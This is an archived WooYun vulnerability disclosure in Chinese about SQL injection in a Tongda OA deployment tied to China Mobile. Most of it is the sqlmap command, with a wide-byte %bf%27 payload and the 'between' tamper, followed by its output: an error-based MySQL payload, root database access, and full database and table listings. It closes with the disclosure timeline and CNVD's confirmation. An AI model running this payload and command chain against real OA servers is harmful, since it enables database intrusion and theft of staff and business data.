乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向核心白帽子及相关领域专家公开 2015-11-19: 细节向普通白帽子公开 2015-11-29: 细节向实习白帽子公开 2015-12-14: 细节向公众公开
sqlmap -u "**.**.**.**/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20" --dbms=mysql --tamper=between
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: FLOW_ID=11%bf' AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw---web server operating system: Windowsweb application technology: PHP 5.2.14, Apache 2.2.16back-end DBMS: MySQL >= 5.0.0current database: 'td_oa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: FLOW_ID=11%bf' AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw---web server operating system: Windowsweb application technology: PHP 5.2.14, Apache 2.2.16back-end DBMS: MySQL >= 5.0.0current user: 'root@**.**.**.**'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: FLOW_ID=11%bf' AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw---web server operating system: Windowsweb application technology: PHP 5.2.14, Apache 2.2.16back-end DBMS: MySQL >= 5.0.0available databases [7]:[*] BUS[*] crscell[*] information_schema[*] mysql[*] TD_OA[*] TD_OA_a[*] TRAINsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: FLOW_ID=11%bf' AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw---web server operating system: Windowsweb application technology: PHP 5.2.14, Apache 2.2.16back-end DBMS: MySQL >= 5.0.0Database: TD_OA[274 tables]+----------------------------------+| session || user || version || address || address_group || affair || app_log || attachment_edit || attend_config || attend_duty || attend_evection || attend_holiday || attend_leave || attend_manager || attend_out || attendance_overtime || bbs_board || bbs_comment || book_info || book_manage || book_manager || book_type || bs_line || calendar || categories_type || censor_data || censor_module || censor_words || chatroom || contact || contract || contract_line || countdown || cp_asset_keep || cp_asset_reflect || cp_asset_type || cp_assetcfg || cp_cptl_info || cp_dpct_sub || cp_prcs_prop || crm_account || crm_account_care || crm_account_contact || crm_action || crm_complain || crm_contract || crm_customer_service || crm_depository || crm_marketing || crm_opportunity || crm_opportunity_products_list || crm_order || crm_order_products_list || crm_procurement_payment || crm_product || crm_product_type || crm_purchase_order || crm_purchase_order_products_list || crm_quotation || crm_quotation_products_list || crm_salepay || crm_solutions || crm_stockout || crm_stockout_products_list || crm_storage || crm_storage_products_list || crm_supplier || crm_supplier_contact || crm_sys_code || crm_sys_code_type || crm_sys_op_priv || crm_sys_uv || crm_sys_uv_field || customer || data_src || department || dept_map || diary || diary_comment || diary_comment_reply || doc_keywords || doc_print_log || doc_recv_data || doc_recv_prcs || doc_recv_priv || doc_send_data || doc_send_prcs || doc_type || efax_account || efax_receive_box || efax_send_box || email || email_body || email_box || email_name || exam_data || exam_flow || exam_paper || exam_quiz || exam_quiz_set || ext_user || field_date || fieldsetting || file_content || file_sort || flow_data_28 || flow_form_type || flow_hook || flow_print_tpl || flow_process || flow_query_tpl || flow_report || flow_report_priv || flow_rule || flow_run || flow_run_data || flow_run_feedback || flow_run_hook || flow_run_log || flow_run_prcs || flow_sort || flow_timer || flow_type || form_sort || gwiki_cate || gwiki_fav || gwiki_log || gwiki_priv || gwiki_tag || gwiki_template || gwiki_term || gwiki_term_final || gwiki_term_temp || hr_care_task || hr_code || hr_insurance_default || hr_insurance_manage || hr_insurance_para || hr_manager || hr_recruit_filter || hr_recruit_plan || hr_recruit_pool || hr_recruit_recruitment || hr_recruit_requirements || hr_sal_data || hr_staff_care || hr_staff_contract || hr_staff_incentive || hr_staff_info || hr_staff_labor_skills || hr_staff_learn_experience || hr_staff_leave || hr_staff_license || hr_staff_reinstatement || hr_staff_relatives || hr_staff_title_evaluation || hr_staff_transfer || hr_staff_work_experience || hr_training_examine || hr_training_plan || hr_training_record || hr_wage_manage || hr_welfare_manage || hrms || icqcontact_tb || icqmsgs_tb || icqservermsg_tb || im_group || im_message_cache || im_offline_file || interface || ip_rule || linkman || meeting || meeting_comment || meeting_equipment || meeting_room || module_priv || mytable || netchat || netdisk || netmeeting || news || news_comment || notes || notify || oa_cyclesource_used || oa_source || oa_source_used || oc_log || office_depository || office_products || office_task || office_transhistory || office_type || order_line || picture || plan_type || portal || product || proj_bug || proj_comment || proj_cost || proj_file || proj_file_log || proj_file_sort || proj_forum || proj_priv || proj_project || proj_task || proj_task_log || provider || provider_linkman || rms_file || rms_lend || rms_roll || rms_roll_room || rsa_keypair || sal_data || sal_flow || sal_item || sale_history || sale_manager || score_date || score_flow || score_group || score_item || seal || seal_keylic || seal_log || secure_key || service || sms || sms2 || sms2_priv || sms3 || sms_body || supply_history || supply_order || sys_code || sys_function || sys_log || sys_menu || sys_para || task || unit || url || user_group || user_map || user_online || user_priv || vehicle || vehicle_maintenance || vehicle_oil_use || vehicle_operator || vehicle_usage || vi_flow_run || vi_user || vote_data || vote_item || vote_title || webmail || webmail_body || wiki_ask || wiki_ask_answer || wiki_comment || wiki_info || winexe || word_model || work_detail || work_person || work_plan || zbap_paiban || zl_file |+----------------------------------+
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2015-10-30 17:44
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.
暂无